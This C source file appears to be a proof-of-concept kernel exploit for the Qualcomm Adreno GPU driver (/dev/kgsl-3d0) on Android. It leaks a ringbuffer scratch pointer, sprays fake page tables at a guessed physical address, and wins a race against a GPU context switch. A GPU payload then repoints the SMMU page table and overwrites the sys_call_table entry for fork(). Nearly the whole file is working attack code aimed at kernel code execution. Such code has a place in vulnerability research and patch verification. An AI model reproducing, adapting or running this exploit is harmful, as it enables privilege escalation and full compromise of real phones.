#include <stdio.h> 
#include <stdlib.h> 
#include <string.h>
#include <stdint.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <errno.h>
#include <time.h>
#include <poll.h>
#include <ctype.h> 
#include <err.h>
#include <sys/syscall.h>
#include <signal.h>

#include "adrenaline.h"

#define PAGE_SIZE 0x1000

#define NPBUFS 64

#define LEVEL1_SHIFT    30
#define LEVEL1_MASK     (0x1ff << LEVEL1_SHIFT)

#define LEVEL2_SHIFT    21
#define LEVEL2_MASK     (0x1ff << LEVEL2_SHIFT)

#define LEVEL3_SHIFT    12
#define LEVEL3_MASK     (0x1ff << LEVEL3_SHIFT)

#define ENTRY_VALID     3
#define ENTRY_RW        (1 << 6)

/* Normal Non-Cacheable memory */
#define ENTRY_MEMTYPE_NNC   (3 << 2)

/* "outer attributes are exported from the processor to the external memory bus
 * and are therefore potentially used by cache hardware external to the core or
 * cluster" */
#define ENTRY_OUTER_SHARE (2 << 8)

/* Active */
#define ENTRY_AF (1<<10)

/* Non-Global */
#define ENTRY_NG (1<<11)

char retbuf[256];

// func from 2019-2215 poc p0
// example usage
//  static char page_buffer[0x1000];
//hexdump_memory((unsigned char *)page_buffer, sizeof(page_buffer));

void hexdump_memory(unsigned char *buf, size_t byte_count) {
  unsigned long byte_offset_start = 0;
  if (byte_count % 16)
    // errx(1, "hexdump_memory called with non-full line");
  for (unsigned long byte_offset = byte_offset_start; byte_offset < byte_offset_start + byte_count;
          byte_offset += 16) {
    char line[1000];
    char *linep = line;
    linep += sprintf(linep, "%08lx  ", byte_offset);
    for (int i=0; i<16; i++) {
      linep += sprintf(linep, "%02hhx ", (unsigned char)buf[byte_offset + i]);
    }
    linep += sprintf(linep, " |");
    for (int i=0; i<16; i++) {
      char c = buf[byte_offset + i];
      if (isalnum(c) || ispunct(c) || c == ' ') {
        *(linep++) = c;
      } else {
        *(linep++) = '.';
      }
    }
    linep += sprintf(linep, "|");
    puts(line);
  }
}

int setup_pagetables(uint8_t *tt0, uint32_t pages, uint32_t tt0phys, uint64_t fake_gpuaddr, uint64_t target_pa) {
    uint64_t *level_base;
    uint64_t level1_index, level2_index, level3_index;
    int i;

    for (i = 0; i < pages; i++) {
        level_base = (uint64_t *) (tt0 + (i * PAGE_SIZE));

        memset(level_base, 0x45, 4096);

        level1_index = (fake_gpuaddr & LEVEL1_MASK) >> LEVEL1_SHIFT;
        level2_index = (fake_gpuaddr & LEVEL2_MASK) >> LEVEL2_SHIFT;
        level3_index = (fake_gpuaddr & LEVEL3_MASK) >> LEVEL3_SHIFT;

        if (level1_index == level2_index || level1_index == level3_index ||
            level2_index == level3_index) {
            return -1;
        }

        level_base[level1_index] = (uint64_t) tt0phys | ENTRY_VALID;
        level_base[level2_index] = (uint64_t) tt0phys | ENTRY_VALID;
        level_base[level3_index] = (uint64_t) (target_pa | ENTRY_VALID | ENTRY_RW |
                                               ENTRY_MEMTYPE_NNC | ENTRY_OUTER_SHARE | ENTRY_AF |
                                               ENTRY_NG);
    }

    return 0;
}

/* modified version of kilroy's kgsl_ctx_create. create a KGSL context that will use
 * ringbuffer 0, and make sure KGSL_CONTEXT_USER_GENERATED_TS is disabled */
int kgsl_ctx_create0(int fd, uint32_t *ctx_id) {
    struct kgsl_drawctxt_create req = {
            .flags = 0x00001812, // low prio, rb 0
    };
    int ret;

    ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &req);
    if (ret)
        return ret;

    *ctx_id = req.drawctxt_id;

    return 0;
}

/* cleanup an existing GPU context */
int kgsl_ctx_destroy(int fd, uint32_t ctx_id) {
    struct kgsl_drawctxt_destroy req = {
            .drawctxt_id = ctx_id,
    };

    return ioctl(fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &req);
}

/* modified version of kilroy's kgsl_map. the choice to use KGSL_MEMFLAGS_USE_CPU_MAP
 * comes from earlier debugging efforts, but a normal user mapping should work as well,
 * it would just need to use uint64_t and drop the flags. */
int kgsl_map(int fd, unsigned long addr, size_t len, uint32_t *gpuaddr) {
    struct kgsl_map_user_mem req = {
            .len = len,
            .offset = 0,
            .hostptr = addr,
            .memtype = KGSL_USER_MEM_TYPE_ADDR,
            .flags = KGSL_MEMFLAGS_USE_CPU_MAP,
    };
    int ret;

    ret = ioctl(fd, IOCTL_KGSL_MAP_USER_MEM, &req);
    if (ret)
        return ret;

    *gpuaddr = req.gpuaddr;

    return 0;
}

/* similar to kgsl_gpu_command_n, but specifically starts with a wait command IB before the
 * variable length repeated IB */
int kgsl_gpu_command_align(int fd, uint32_t ctx_id, uint32_t wait_gpuaddr,
        uint32_t wait_cmdsize, uint32_t nop_gpuaddr, uint32_t nop_cmdsize, uint32_t n) {
    struct kgsl_command_object *cmds;

    struct kgsl_gpu_command req = {
            .context_id = ctx_id,
            .cmdsize = sizeof(struct kgsl_command_object),
            .numcmds = n,
    };
    size_t cmds_size;
    uint32_t i;

    cmds_size = n * sizeof(struct kgsl_command_object);

    cmds = (struct kgsl_command_object *) malloc(cmds_size);

    if (cmds == NULL) {
        return -1;
    }

    memset(cmds, 0, cmds_size);

    cmds[0].flags = KGSL_CMDLIST_IB;
    cmds[0].gpuaddr = wait_gpuaddr;
    cmds[0].size = wait_cmdsize;

    for (i = 1; i < n; i++) {
        cmds[i].flags = KGSL_CMDLIST_IB;
        cmds[i].gpuaddr = nop_gpuaddr;
        cmds[i].size = nop_cmdsize;
    }

    req.cmdlist = (unsigned long) cmds;

    return ioctl(fd, IOCTL_KGSL_GPU_COMMAND, &req);
}

/* send a variable number of repeated IBs to the GPU. */
int kgsl_gpu_command_n(int fd, uint32_t ctx_id, uint32_t gpuaddr, uint32_t cmdsize, uint32_t n) {
    struct kgsl_command_object *cmds;

    struct kgsl_gpu_command req = {
            .cmdsize = sizeof(struct kgsl_command_object),
            .numcmds = n,
            .context_id = ctx_id,
    };
    size_t cmds_size;
    uint32_t i;

    cmds_size = n * sizeof(struct kgsl_command_object);

    cmds = (struct kgsl_command_object *) malloc(cmds_size);

    if (cmds == NULL) {
        return -1;
    }

    memset(cmds, 0, cmds_size);

    for (i = 0; i < n; i++) {
        cmds[i].flags = KGSL_CMDLIST_IB;
        cmds[i].gpuaddr = gpuaddr;
        cmds[i].size = cmdsize;
    }

    req.cmdlist = (unsigned long) cmds;

    return ioctl(fd, IOCTL_KGSL_GPU_COMMAND, &req);
}

/* send pad IBs and a payload IB at a specific index to the GPU. the index is chosen to win
 * the race condition with the targeted context switch */
int kgsl_gpu_command_payload(int fd, uint32_t ctx_id, uint32_t gpuaddr, uint32_t cmdsize, uint32_t n, uint32_t target_idx, uint64_t target_cmd, uint32_t target_size) {
    struct kgsl_command_object *cmds;

    struct kgsl_gpu_command req = {
            .context_id = ctx_id,
            .cmdsize = sizeof(struct kgsl_command_object),
            .numcmds = n,
    };
    size_t cmds_size;
    uint32_t i;

    cmds_size = n * sizeof(struct kgsl_command_object);

    cmds = (struct kgsl_command_object *) malloc(cmds_size);

    if (cmds == NULL) {
        return -1;
    }

    memset(cmds, 0, cmds_size);

    for (i = 0; i < n; i++) {
        cmds[i].flags = KGSL_CMDLIST_IB;

        if (i == target_idx) {
            cmds[i].gpuaddr = target_cmd;
            cmds[i].size = target_size;
        }
        else {
            /* the shift here is helpful for debugging failed alignment */
            cmds[i].gpuaddr = gpuaddr + (i << 16);
            cmds[i].size = cmdsize;
        }
    }

    req.cmdlist = (unsigned long) cmds;

    return ioctl(fd, IOCTL_KGSL_GPU_COMMAND, &req);
}

void adrenaline_child(int read_pipe, int write_pipe) {
    int fd, ret;
    uint32_t map_addr = 0x4000a000;
    uint32_t *cs_buf, *cs_cmds;
    uint32_t cs_cmds_size;
    uint32_t cs_gpuaddr;
    uint32_t ctx_id;
    uint32_t sync;
    struct pollfd pfd;

    printf("[*] child: starting adrenaline_child\n");

    fd = open("/dev/kgsl-3d0", O_RDWR);

    if (fd == -1) {
        return;
    }

    cs_buf = (uint32_t *) mmap((void *) map_addr, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED|MAP_LOCKED, -1, 0);

    if (cs_buf == MAP_FAILED) {
        return;
    }

    ret = kgsl_map(fd, (unsigned long) cs_buf, 4096, &cs_gpuaddr);

    if (ret == -1) {
        return;
    }

    ret = kgsl_ctx_create0(fd, &ctx_id);

    if (ret) {
        return;
    }

    cs_cmds = cs_buf;
    /* if executed this will show up as a invalid opcode GPU fault in dmesg, which is the
     * indication that we lost the race condition. if the parent wins the race condition, this
     * will never be executed */
    /* CP switches the pagetable (context switch)*/
	// *cs_cmds++ = cp_type4_packet(CP_SMMU_TABLE_UPDATE, 3);
    // cs_cmds+= cp_gpuaddr(cs_cmds, cs_gpuaddr);
    *cs_cmds++ = 0x21212121;
    *cs_cmds++ = cp_type7_packet(CP_SMMU_TABLE_UPDATE, 3);
    cs_cmds+= cp_gpuaddr(cs_cmds, cs_gpuaddr);
    cs_cmds_size = (cs_cmds - cs_buf) * 4;

    pfd.fd = read_pipe;
    pfd.events = POLLIN;
    pfd.revents = 0;

    if (poll(&pfd, 1, -1) == -1) {
        exit(-1);
    }

    printf("[*] child: recieve 6 from pipe buff, and kick off a GPU context switch\n");

    read(read_pipe, &sync, sizeof(uint32_t));

    if (sync != 0x66666666) {
        return;
    }
    
    printf("[*] child: run GPU context switch\n");
    ret = kgsl_gpu_command_n(fd, ctx_id, cs_gpuaddr, cs_cmds_size, 1);

    if (ret == -1) {
        return;
    }

    printf("[*] child: let the parent process know that the context switch has been dispatched\n");

    /* let the parent process know that the context switch has been dispatched */
    sync = 0x77777777;
    write(write_pipe, &sync, sizeof(uint32_t));

    usleep(200000);

    ret = kgsl_ctx_destroy(fd, ctx_id);

    if (ret == -1) {
        return;
    }

    ret = munmap(cs_buf, 4096);

    if (ret == -1) {
        return;
    }

    close(fd);

    return;
}

char *adrenaline_parent(int read_pipe, int write_pipe, uint32_t rptr_base) {
    int fd, ret, i;
    struct pollfd pfd;
    uint32_t map_addr = 0x40000000;
    uint32_t *wait_cmds, wait_cmds_size;
    uint32_t *wait_cmd_buf, wait_cmd_gpuaddr;
    uint32_t *data_buf, data_gpuaddr;
    uint32_t *nop_cmds, nop_cmds_size;
    uint32_t *nop_buf, nop_cmd_gpuaddr;
    uint32_t *payload_cmds, payload_cmds_size;
    uint32_t *payload_buf, payload_cmd_gpuaddr;
    uint32_t ctx_id, sync;
    uint32_t pbuf_len;
    uint8_t *pbufs[NPBUFS], *pbuf;
    uint64_t phyaddr;

    int j;

    printf("[*] parent: starting adrenaline_parent\n");

    fd = open("/dev/kgsl-3d0", O_RDWR);

    if (fd == -1) {
        return "error opening kgsl-3d0";
    }

    wait_cmd_buf = (uint32_t *) mmap((void *) map_addr, PAGE_SIZE,
                                        PROT_READ|PROT_WRITE,
                                        MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED, -1, 0);

    if (wait_cmd_buf == MAP_FAILED) {
        return "mmap failed (wait_cmd_buf)";
    }

    ret = kgsl_map(fd, (unsigned long) wait_cmd_buf, PAGE_SIZE, &wait_cmd_gpuaddr);

    if (ret == -1) {
        return "kgsl_map failed (wait_cmd_buf)";
    }

    map_addr += PAGE_SIZE;

    data_buf = (uint32_t *) mmap((void *) map_addr, PAGE_SIZE,
                                        PROT_READ|PROT_WRITE,
                                        MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED, -1, 0);

    if (data_buf == MAP_FAILED) {
        return "mmap failed (data_buf)";
    }

    ret = kgsl_map(fd, (unsigned long) data_buf, PAGE_SIZE, &data_gpuaddr);

    if (ret == -1) {
        return "kgsl_map failed (data_buf)";
    }

    map_addr += PAGE_SIZE;

    nop_buf = (uint32_t *) mmap((void *) map_addr, PAGE_SIZE,
                                        PROT_READ|PROT_WRITE,
                                        MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED, -1, 0);

    if (nop_buf == MAP_FAILED) {
        return "mmap failed (nop_buf)";
    }

    ret = kgsl_map(fd, (unsigned long) nop_buf, PAGE_SIZE, &nop_cmd_gpuaddr);

    if (ret == -1) {
        return "kgsl_map failed (nop_buf)";
    }

    map_addr += PAGE_SIZE;

    payload_buf = (uint32_t *) mmap((void *) map_addr, PAGE_SIZE,
                                        PROT_READ|PROT_WRITE,
                                        MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED|MAP_LOCKED, -1, 0);

    if (payload_buf == MAP_FAILED) {
        return "mmap failed (payload_buf)";
    }

    ret = kgsl_map(fd, (unsigned long) payload_buf, PAGE_SIZE, &payload_cmd_gpuaddr);

    if (ret == -1) {
        return "kgsl_map failed (payload_buf)";
    }

    /* we use ringbuffer 0 because it seems to be unused, so we don't have any contention
     * and the offsets are stable */
    ret = kgsl_ctx_create0(fd, &ctx_id);

    if (ret) {
        snprintf(retbuf, 255, "kgsl_ctx_create0 failed");
        return retbuf;
    }

    /* this is the physical address of the fake page table that we will point the SMMU TTBR0 to.
     *
     * it's chosen more or less at random based on results of performing a similar spray and then
     * checking commonly recurring entries in /proc/self/pagemap
     */
    phyaddr = 0xfebeb000;

    /* spray 16mb per mapping */
    pbuf_len = PAGE_SIZE * 4096;

    /* this loop is spraying a fake page table so that it hopefully lands at a fixed physical
     * address. one way that the exploit can fail is if this page has already been allocated,
     * in which case a reboot might be necessary */
    for (i = 0; i < NPBUFS; i++) {
        pbuf = (uint8_t *) mmap(NULL, pbuf_len, PROT_READ | PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);

        if (pbuf == (uint8_t *) MAP_FAILED) {
            snprintf(retbuf, 255, "pbuf mmap failed (%d)", i);
            return retbuf;
        }

        /* our fake gpuaddress (0x40403000) is chosen to allow level1/2/3 to be at different
         * offsets within the same page (e.g. level 1 = 0x1, level2 = 0x3, level3 = 0x3).
         *
         * the target physical page (0x821D9000) corresponds to sys_call_table, which is at
         * a fixed physical address that you can calculate by taking the base of "Kernel Code"
         * from /proc/iomem and then adding (sys_call_table - _text) from /proc/kallsyms */
        ret = setup_pagetables(pbuf, pbuf_len/4096, phyaddr, 0x40403000, 0x821a5000);

        if (ret == -1) {
            snprintf(retbuf, 255, "setup_pagetables failed");
            return retbuf;
        }

        pbufs[i] = pbuf;
    }

    /* setting up out wait commands. first stage (0x41414141) waits for the ringbuffer to be
     * layed out correctly, then the scratch buffer rptr is corrupted, and finally the second
     * stage (0x42424242) waits for the ringbuffer corruption to start.
     *
     * the return from this IB will be followed by a context switch, which will be corrupted
     * mid-execution (e.g. while protected mode is disabled). */
    wait_cmds = wait_cmd_buf;
    
    /* stage 1 wait */
    *wait_cmds++ = cp_type7_packet(CP_WAIT_REG_MEM, 6);
    *wait_cmds++ = 0x13;
    wait_cmds += cp_gpuaddr(wait_cmds, data_gpuaddr);
    *wait_cmds++ = 0x41414141;
    *wait_cmds++ = 0xffffffff;
    *wait_cmds++ = 0x1;

    /* corrupt scratch rptr for ringbuffer 0 */
    *wait_cmds++ = cp_type7_packet(CP_MEM_WRITE, 3);
    wait_cmds += cp_gpuaddr(wait_cmds, rptr_base);
    *wait_cmds++ = 0x1ffc;

    /* ensure that the write has taken effect */
    *wait_cmds++ = cp_type7_packet(CP_WAIT_REG_MEM, 6);
    *wait_cmds++ = 0x13;
    wait_cmds += cp_gpuaddr(wait_cmds, rptr_base);
    *wait_cmds++ = 0x1ffc;
    *wait_cmds++ = 0xffffffff;
    *wait_cmds++ = 0x1;

    /* stage 2 wait */
    *wait_cmds++ = cp_type7_packet(CP_WAIT_REG_MEM, 6);
    *wait_cmds++ = 0x13;
    wait_cmds += cp_gpuaddr(wait_cmds, data_gpuaddr+4);
    *wait_cmds++ = 0x42424242;
    *wait_cmds++ = 0xffffffff;
    *wait_cmds++ = 0x1;

    wait_cmds_size = (wait_cmds - wait_cmd_buf) * 4;

    /* multi-purpose NOP buffer, mostly used for getting the layout of the ringbuffer correct */
    nop_cmds = nop_buf;
    *nop_cmds++ = cp_type7_packet(CP_NOP, 1);
    *nop_cmds++ = cp_type7_packet(CP_NOP, 0);
    nop_cmds_size = (nop_cmds - nop_buf) * 4;

    /* payload IB. this runs with protected mode disabled (and apriv enabled) */
    payload_cmds = payload_buf;

    *payload_cmds++ = cp_type7_packet(CP_NOP, 1);
    *payload_cmds++ = 0xffffffff;

    /* borrowed from driver code for "stabler synchroinzation" */
    payload_cmds += _adreno_iommu_add_idle_indirect_cmds(payload_cmds);
    payload_cmds += cp_wait_for_idle(payload_cmds);
    payload_cmds += cp_wait_for_me(payload_cmds);

    /* write fake page table to TTBR0 register */
    *payload_cmds++ = cp_register(0x12008, 2);
    *payload_cmds++ = phyaddr;
    *payload_cmds++ = 0x00400000;

    /* following the driver's actions after page table changes */
    payload_cmds += cp_wait_for_me(payload_cmds);
    payload_cmds += cp_wait_for_idle(payload_cmds);
    payload_cmds += cp_invalidate_state(payload_cmds);

    /* overwrite fork()'s syscall table entry for some hasty fireworks */
    *payload_cmds++ = cp_type7_packet(CP_MEM_WRITE, 3);
    payload_cmds += cp_gpuaddr(payload_cmds, 0x40403000+16);
    *payload_cmds++ = 0x13371337;
    *payload_cmds++ = cp_type7_packet(CP_MEM_WRITE, 3);
    payload_cmds += cp_gpuaddr(payload_cmds, 0x40403000+20);
    *payload_cmds++ = 0x13371337;

    payload_cmds_size = (payload_cmds - payload_buf) * 4;

    usleep(50000);

    /* first we pad the ringbuffer to get our wait IB roughly in the middle */
    ret = kgsl_gpu_command_n(fd, ctx_id, nop_cmd_gpuaddr, nop_cmds_size, 868);

    if (ret == -1) {
        snprintf(retbuf, 255, "nop_cmd kgsl_gpu_command failed errno %d", errno);
        return retbuf;
    }

    printf("[*] parent: kick off the wait command, and follow it with the correct amount of alignment nops\n");

    /* kick off the wait command, and follow it with the correct amount of alignment nops.
     * the purpose of the alignment nops is to get the child's context switch in the right place
     * for the race condition one guess would be that this is to get aligned to a boundary based
     * on cache line width or an internal prefetch buffer size, since it seems to be stable */
    ret = kgsl_gpu_command_align(fd, ctx_id, wait_cmd_gpuaddr, wait_cmds_size, nop_cmd_gpuaddr, nop_cmds_size, 36);

    if (ret == -1) {
        snprintf(retbuf, 255, "wait_cmd kgsl_gpu_command failed errno %d", errno);
        return retbuf;
    }

    printf("[*] parent: send a message to our child process, which will kick off a GPU context switch\n");

    /* send a message to our child process, which will kick off a GPU context switch */
    sync = 0x66666666;
    write(write_pipe, &sync, sizeof(uint32_t));

    pfd.fd = read_pipe;
    pfd.events = POLLIN;
    pfd.revents = 0;
    
    printf("[*] parent: wait for confirmation that the context switch is in before proceeding \n");

    /* wait for confirmation that the context switch is in before proceeding */
    if (poll(&pfd, 1, 4) <= 0) {
        snprintf(retbuf, 255, "poll error or timeout");
        return retbuf;
    }

    read(read_pipe, &sync, sizeof(uint32_t));

    if (sync != 0x77777777) {
        snprintf(retbuf, 255, "unexpected sync result %x", sync);
        return retbuf;
    }

    printf("[*] parent: fill up the rest of ringbuffer 0 \n");

    /* fill up the rest of ringbuffer 0 so that subsequent GPU commands will start at the
     * beginning of the ringbuffer. */
    ret = kgsl_gpu_command_n(fd, ctx_id, nop_cmd_gpuaddr, nop_cmds_size, 888);

    if (ret == -1) {
        snprintf(retbuf, 255, "nop_cmd kgsl_gpu_command failed errno %d", errno);
        return retbuf;
    }

    usleep(20000);

    /* the next two GPU commands are inert, but are used to get correct alignment for the
     * race condition. without this we likely end up in the middle of an IB command, which
     * would result in a fault */
    ret = kgsl_gpu_command_n(fd, ctx_id, nop_cmd_gpuaddr, nop_cmds_size, 100);

    if (ret == -1) {
        snprintf(retbuf, 255, "nop_cmd kgsl_gpu_command failed errno %d", errno);
        return retbuf;
    }

    ret = kgsl_gpu_command_n(fd, ctx_id, nop_cmd_gpuaddr, nop_cmds_size, 1);

    if (ret == -1) {
        snprintf(retbuf, 255, "nop_cmd kgsl_gpu_command failed errno %d", errno);
        return retbuf;
    }

    printf("[*] parent: signal the wait command to progress to scratch buffer rptr corruption \n");

    /* at this point the ringbuffer layout is complete, and we can signal the wait command
     * to progress to scratch buffer rptr corruption */
    *data_buf = 0x41414141;
    __builtin___clear_cache((char *) data_buf, (char *) data_buf+4096);

    // hexdump scratch buffer rptr corrupt
    printf("[*] parent: scratch buffer rptr corrupt with AAAA\n");
    hexdump_memory((unsigned char *)data_buf, sizeof(data_buf+4096));

    /* by the time this GPU command is dispatched, the scratch rptr will be invalid, which means
     * this will overwrite the existing ringbuffer contents (wait command, alignment NOPs,
     * and then the context switch) */
    ret = kgsl_gpu_command_payload(fd, ctx_id, nop_cmd_gpuaddr, nop_cmds_size, 0x376, 0x374, payload_cmd_gpuaddr, payload_cmds_size);

    if (ret == -1) {
        snprintf(retbuf, 255, "nop_cmd kgsl_gpu_command failed errno %d", errno);
        return retbuf;
    }

    usleep(50000);

    /* finish stage 2 of the wait command. the GPU will then execute the alignment NOPs and
     * start executing the context switch. before the context switch finishes the payload GPU
     * command will be written and executed */
    *(data_buf+1) = 0x42424242;
    __builtin___clear_cache((char *) data_buf, (char *) data_buf+4096);

     // hexdump exploit payload buffer 
    printf("[*] parent: exploit payload buffer\n");
    hexdump_memory((unsigned char *)data_buf, sizeof(data_buf+4096));

    usleep(50000);

    snprintf(retbuf, 255, "adrenaline race lost: context id: (%d), rptr_base: (%p) -- try again", ctx_id, rptr_base);
    return retbuf;
}

char* adrenaline(uint32_t rptr_base) {
    int parent_pipefd[2];
    int child_pipefd[2];
    pid_t p;
    char *retp;
    int i;

    printf("[*] adrenaline: starting adrenaline\n");

    pipe(parent_pipefd);
    pipe(child_pipefd);
    p = fork();
    
    /* the child process is used primarily to generate the ringbuffer context switch commands
     * that we will race against with the parent process. most of the work happens in the parent */
    if (p == 0) {
        adrenaline_child(child_pipefd[0], parent_pipefd[1]);
        exit(0);
    }
    else {
        retp = adrenaline_parent(parent_pipefd[0], child_pipefd[1], rptr_base);
    }

    return strdup(retp);
}

char* adrenaline_rptr_child(int read_pipe, int write_pipe) {
    int fd, ret;
    uint32_t ctx_id;
    uint32_t *cmds, cmds_size;
    uint32_t cmd_gpuaddr, data_gpuaddr;
    uint32_t *cmd_buf, *data_buf;
    uint32_t map_addr = 0x50005000;
    uint32_t rptr_base;
        
    printf("[*] rptr_child: starting adrenaline_rptr_child\n");

    fd = open("/dev/kgsl-3d0", O_RDWR);

    if (fd == -1) {
        return "Error opening kgsl-3d0";
    }

    cmd_buf = (uint32_t *) mmap((void *) map_addr, PAGE_SIZE,
            PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED, -1, 0);

    if (cmd_buf == MAP_FAILED) {
        return "mmap failed (cmd_buf)";
    }

    ret = kgsl_map(fd, (unsigned long) cmd_buf, PAGE_SIZE, &cmd_gpuaddr);

    if (ret == -1) {
        return "kgsl_map failed (cmd_buf)";
    }

    map_addr += PAGE_SIZE;

    data_buf = (uint32_t *) mmap((void *) map_addr, PAGE_SIZE,
            PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
    if (data_buf == MAP_FAILED) {
        return "mmap failed (wait_buf)";
    }

    ret = kgsl_map(fd, (unsigned long) data_buf, PAGE_SIZE, &data_gpuaddr);

    if (ret == -1) {
        return "kgsl_map failed (wait_buf)";
    }

    ret = kgsl_ctx_create0(fd, &ctx_id);

    if (ret) {
        return "kgsl_ctx_create0 failed";
    }

    cmds = cmd_buf;

    /* the constant value 0xfc04b318 is a GPU address that refers to the contents of
     * ringbuffer 0. this specific offset is not guaranteed to work on all kernels, as the
     * contents of the ringbuffer may change across versions. specifically we're reading out
     * the argument to the CP_MEM_WRITE in a6xx_preemption_pre_ibsubmit, which uses the
     * scratch buffer as a destination argument. */
    *cmds++ = cp_type7_packet(CP_MEM_TO_MEM, 5);
    *cmds++ = 0;
    cmds += cp_gpuaddr(cmds, data_gpuaddr);
    cmds += cp_gpuaddr(cmds,  0xfc04b318);

    cmds_size = (cmds - cmd_buf) * 4;

    usleep(50000);

    ret = kgsl_gpu_command_n(fd, ctx_id, cmd_gpuaddr, cmds_size, 1);

    if (ret == -1) {
        snprintf(retbuf, 255, "kgsl_gpu_command failed errno %d", errno);
        return strdup(retbuf);
    }

    usleep(50000);

    rptr_base = *(data_buf) & (~0xFFF);
    write(write_pipe, &rptr_base, sizeof(uint32_t));

    // hexdump ringbuffer to seee rptr
    printf("[*] dump ringbuffer\n");
    hexdump_memory((unsigned char *)rptr_base, sizeof(rptr_base));

    usleep(200000);

    ret = munmap(cmd_buf, 4096);

    if (ret == -1) {
        return "munmap failed (cmd_buf)";
    }

    ret = munmap(data_buf, 4096);

    if (ret == -1) {
        return "munmap failed (wait_buf)";
    }

    ret = kgsl_ctx_destroy(fd, ctx_id);

    if (ret == -1) {
        return "kgsl_ctx_destroy failed errno";
    }

    close(fd);

    snprintf(retbuf, 255, "%x", rptr_base);
    return strdup(retbuf);
}

uint32_t adrenaline_rptr(void) {
    struct pollfd pfd;
    int parent_pipefd[2];
    int child_pipefd[2];
    pid_t p;
    uint32_t rptr_base;

    pipe(parent_pipefd);
    pipe(child_pipefd);
        
    p = fork();

    if (p == 0) {
        /* perform the rptr leak in a child process in order to keep our current process
         * in a clean state in terms of GPU mappings -- not strictly necessary though.
         * returns an unused string that was previously used for debugging purposes, and
         * the base of the scratch buffer is sent over a pipe to the parent instead. */
        adrenaline_rptr_child(child_pipefd[0], parent_pipefd[1]);
        exit(0);
    }

    pfd.fd = parent_pipefd[0];
    pfd.events = POLLIN;
    pfd.revents = 0;

    if (poll(&pfd, 1, -1) <= 0) {
        return -1;
    }

    read(parent_pipefd[0], &rptr_base, sizeof(uint32_t));

    return rptr_base;
}
 
int main(int argc, char** argv) { 

    uint32_t rptr_base = -1;
    char *strtoul_ptr;
    char *adrenaline_str;

   if (argc < 2) {
        printf("Usage: %s <rptr>\n", argv[0]);
        printf("No arg will run leak_rptr\n");
        
        // perform the rptr leak
        rptr_base = adrenaline_rptr();

        if (rptr_base == -1) {
        printf("adrenaline_rptr failed");
        }

        else if (rptr_base < 0xFC000000 || rptr_base >= 0xFD400000) {
        return printf("adrenaline_rptr: %p is out of global mapping range\n", rptr_base);
        }
    }
    else if(argc > 2) {
        printf("Too many arguments supplied.\n");
    }
    else {
        // set rptr as input
        rptr_base = strtoul((argv[1]), &strtoul_ptr, 16);
        printf("[*] main: rptr is passed as %p\n", rptr_base);
    }

    printf("[*] main: rptr base is %p\n", rptr_base);
    // start race condition to context switch, 
    // write to gpu, and gain kernel code exec
    adrenaline_str = adrenaline(rptr_base);

    printf("%s\n", adrenaline_str);

    return 0; 
}